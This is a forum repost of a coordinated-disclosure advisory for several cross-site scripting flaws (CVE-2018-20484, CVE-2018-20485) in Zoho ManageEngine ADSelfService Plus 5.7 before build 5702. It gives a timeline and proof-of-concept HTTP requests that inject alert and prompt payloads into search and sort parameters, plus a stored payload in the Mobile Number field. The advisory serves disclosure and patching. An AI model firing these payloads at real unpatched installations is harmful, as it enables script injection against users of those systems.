Post a Reply
2976 views

Zoho ManageEngine ADSelfService Plus 5.7 Cross Site Scripting

  1. 6 months ago

    hack_img4.png

    Zoho ManageEngine ADSelfService Plus version 5.7 builds prior to 5702 suffer from multiple cross site scripting vulnerabilities.

    MD5 | a70a0359afdf89e0ea6393358b8b84c9

    Download => zohomeadssplus57-xss.txt

    [+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting
    [+] Author: Ibrahim Raafat
    [+] Twitter: https://twitter.com/RaafatSEC
    [+] Download: https://www.manageengine.com/products/self-service-password/download-free.html?
    
    
    [+] TimeLine
      [-] Nov 23, 2018  Reported
      [-] Nov 26, 2018  Triaged
      [-] Dec 27, 2018   Fixed
      [-] May 08, 2019  Public Disclosure
    
    [+] Description:
      Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has Multiple XSS vulnerabilites
    
    [+] POC
    
    [-] Employee search form
    
    POST /EmployeeSearch.cc?actionId=Search HTTP/1.1
    
    searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf=
    searchType parameter:
    searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf=
    
    
    2- Employee Search – ascending parameter
    
    /EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1
    
    selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true’;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf=
    
    
    3- EmpSearch.cc - searchString parameter
    
    POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1
    
    &adscsrf=
    
    4- Stored XSS in self-update layout implementation.
    
    /SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
    Insert the following payload into Mobile Number field, and save
    Payload: 11111111]";a=alert,a(31337)//
    Code execute here:
    /Enrollment.do?selectedTab=Enrollment
    
    
    [+] Assigned CVE:  CVE-2018-20484,CVE-2018-20485
    [+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html
 

or Sign Up to reply!